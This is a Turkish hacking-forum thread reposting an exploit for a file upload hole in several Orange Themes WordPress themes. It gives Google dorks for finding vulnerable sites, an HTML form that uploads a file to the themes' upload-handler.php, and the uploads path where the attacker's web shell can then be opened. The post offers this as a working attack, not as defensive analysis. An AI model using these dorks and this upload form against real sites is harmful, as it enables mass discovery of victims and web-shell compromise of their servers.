Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Wordpress Orange Themes CSRF Dosya Yükleme Açığı
#1
Kod:
#Title : Wordpress Orange Themes CSRF File Upload Vulnerability
#Author : Jje Incovers
#Date : 01/12/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://www.orange-themes.com/
#Download : http://www.orange-themes.com/portfolio/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/wp-content/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php

Note :
Script CSRF equate with dork you use

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/29946/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 183 Dün, Saat: 18:42
Son Yorum: the_zizil
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 73 4,378 04-12-2016, Saat: 14:05
Son Yorum: SheelWe
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 109 04-12-2016, Saat: 12:21
Son Yorum: antisecureman
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 537 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 206 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
Anahtar Kelimeler

Wordpress Orange Themes CSRF Dosya Yükleme Açığı indir, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Videosu, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Online izle, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Bedava indir, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Yükle, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Hakkında, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Nedir, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Free indir, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Oyunu, Wordpress Orange Themes CSRF Dosya Yükleme Açığı Download


1 Ziyaretçi